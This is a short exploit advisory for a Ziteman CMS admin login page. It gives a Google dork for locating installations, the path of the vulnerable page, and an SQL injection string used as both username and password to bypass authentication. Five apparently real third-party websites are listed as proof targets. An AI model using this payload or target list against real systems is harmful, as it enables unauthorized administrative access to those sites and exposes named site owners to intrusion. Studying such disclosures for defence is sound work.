#********************************************************************************
# Exploit Title : Ziteman Login page Bypass Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Software Link : http://www.ziteman.dk
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:" Powered by Ziteman CMS"
#
# Date: 2013/10/10
#
--------------------------------------------------------------------
# Exploit : Login page bypass
#
# Location : [Target]/admincss/default.asp
#
# Username :1'or'1'='1
#
# Password :1'or'1'='1
######################
# Proof:
#
# http://www.ark-jr.dk/admincss/default.asp
#
# http://www.apservice.dk/admincss/default.asp
#
# http://www.cjservice.dk/admincss/default.asp
#
# http://www.slibecentral.dk/admincss/default.asp
#
# http://www.vhm.dk/admincss/default.asp
#
######################
discovered by : ACC3SS
######################